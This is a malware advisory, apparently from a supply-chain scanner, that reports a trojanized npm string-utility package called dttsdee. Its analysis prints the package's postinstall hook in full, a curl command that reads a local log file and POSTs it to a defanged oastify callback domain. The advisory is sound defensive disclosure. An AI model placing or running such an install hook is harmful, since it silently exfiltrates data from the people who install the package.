LWA-2026-5968 MAL-2026-6462 ↗ confirmed malware

dttsdee@1.0.0

Malicious code in dttsdee (npm)

T1195.002 · Compromise Software Supply ChainT1059.007 · JavaScriptT1082 · System Information DiscoveryT1071.001 · Web ProtocolsT1041 · Exfiltration Over C2 Channel

Analysis

dttsdee@1.0.0 is a trojanized string-utility package whose postinstall hook silently exfiltrates system data. On npm install, the lifecycle script runs: curl -X POST -d "$(cat /data/logs/monitor-2026-06-25.log)" hxxp://3dhd6wwmusbh04m22igmzvb4hvnmblza[.]oastify[.]com/data — it reads the system monitor log file and sends its contents via HTTP POST to the oastify[.]com callback domain 3dhd6wwmusbh04m22igmzvb4hvnmblza[.]oastify[.]com. The bundled utility code is decoy; the malicious behaviour is the postinstall hook.

analyzed by
Leitwacht
first seen
Jun 25, 2026, 10:07 AM
analyzed
Jun 25, 2026, 10:08 AM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.